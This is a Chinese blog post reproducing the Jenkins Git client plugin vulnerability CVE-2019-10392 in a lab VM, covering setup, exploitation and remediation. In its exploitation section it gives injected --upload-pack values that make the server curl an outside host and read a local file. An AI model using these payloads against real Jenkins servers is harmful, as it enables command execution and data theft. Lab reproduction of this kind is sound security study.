共381 次浏览

Jenkins CVE-2019-10392漏洞复现

jenkins搭建、插件安装、漏洞利用、修复意见

一、Jenkins搭建

可以去Jenkins的官网找到搭建过程。根据自己的环境需求来选择相应的版本。官网下载地址https://jenkins.io/zh/download/

建议在虚拟机里面进行搭建并复现漏洞,避免在物理机中直接安装。我使用的是CentOS系统,点击后会有详细的安装步骤,以及需要的java版本。我们要事先安装好java后才可以使用Jenkins。

需要注意的是:
1.尽量不要用yum install Jenkins来安装,下载速度非常慢。根据官方提供的安装步骤先完成yum安装前面的步骤,自行下载rpm包,上传至虚拟机。然后执行命令:rpm -ivh [Jenkins的rpm包名] 进行安装。
2.如果使用CentOS进行安装,需要注意java的版本,使用java -verison查看,如果显示的是下图这样的输出,那么该版本的java与Jenkins不兼容。

不兼容的java版本

兼容的java版本

安装完rpm包后可以访问http://IP:8080来进行Jenkins的图形化界面安装。根据提示一步步来就好。

这里解决一个出现的问题,就是访问http://IP:8080后一直显示Please wait while Jenkins is getting ready to work ………如果长时间没有进行跳转,那么需要进入Jenkins的工作目录(我的目录是/var/lib/jenkins/)打开hudson.model.UpdateCenter.xml文件。将里面的 http://updates.jenkins-ci.org/update-center.json修改为 http://mirror.xmission.com/jenkins/updates/update-center.json然后重启Jenkins,就可以解决该问题。

二、插件安装

这是安装好的Jenkins界面

在系统管理->管理用户中新建一个非管理员用户

在系统管理->全局安全配置->授权策略中,选择安全矩阵。添加刚刚创建的用户,并且给予权限。

下载漏洞版本的插件

http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi
http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi

在系统管理->插件管理->高级中上传插件并安装

三、漏洞利用

安装完成后,新建一个项目,选择自由风格软件项目。点击保存后,在源码管理中选择git。此时就可以输入想要执行的命令了。

–upload-pack=”`curl http://192.168.120.62:81`”

执行结果

在/home下创建一个文件test,在里面随便输入了一些内容。

再回到Jenkins中执行验证一下显示的内容是不是我们在test中输入的–upload-pack=”`cat /home/test`”

成功显示出了test文件里的内容~

四、修复建议

建议Git客户端插件3.0.0-rc的用户降级到2.8.5(并将Git插件从4.0.0-rc 降级到最新的3.x版本以解决依赖性问题)。

官方安全性说明

https://jenkins.io/security/advisory/2019-09-12/

 

 

 

此条目发表在未分类分类目录。将固定链接加入收藏夹。